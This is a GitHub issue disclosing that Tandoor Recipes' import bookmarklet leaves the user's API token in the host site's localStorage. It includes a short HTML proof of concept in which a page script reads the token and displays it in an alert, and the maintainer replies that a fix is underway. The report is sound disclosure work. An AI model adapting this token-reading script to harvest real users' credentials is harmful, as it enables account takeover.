### ISSUE TITLE
Import Bookmarklet Leaks API Token

### ISSUE THREAD

**Issue by mark-monteiro** [TandoorRecipes/recipes#1978]
### Tandoor Version

1.3.3

### Setup

Docker / Docker-Compose

### Reverse Proxy

Caddy

### Bug description

The import bookmarklet saves several pieces of sensitive information, including the user's API token, to localstorage on the website it is executed on. As I understand it, the host website can also access the same localstorage so this information is leaking to external websites. Local storage also never expires so a malicious website could access the token at any time in the future.

Below is a simple HTML file that demonstrates the issue. As a malicious website I could execute the following script to get access to the Tandoor API token for anyone who uses the bookmarklet on my site.

```html
<!DOCTYPE html>
<html>
    <head>
    </head>
    <body>
        Click the bookmarklet to demonstrate the issue.
        <script>
            const unsubscribe = setInterval(() => {
                const token = localStorage.getItem('token');
                if (token) {
                    alert('Hello, I am a script running on the host webpage. I have access to the auth token: ' + token);
                    clearInterval(unsubscribe);
                }
            })
        </script>
    </body>
</html>
```

**Comment by vabene1111** [comment]
yes, i am currently working on several measures to prevent this from happening, i will close this issue to not raise unnecessary attention but it is in the works, thanks for reporting
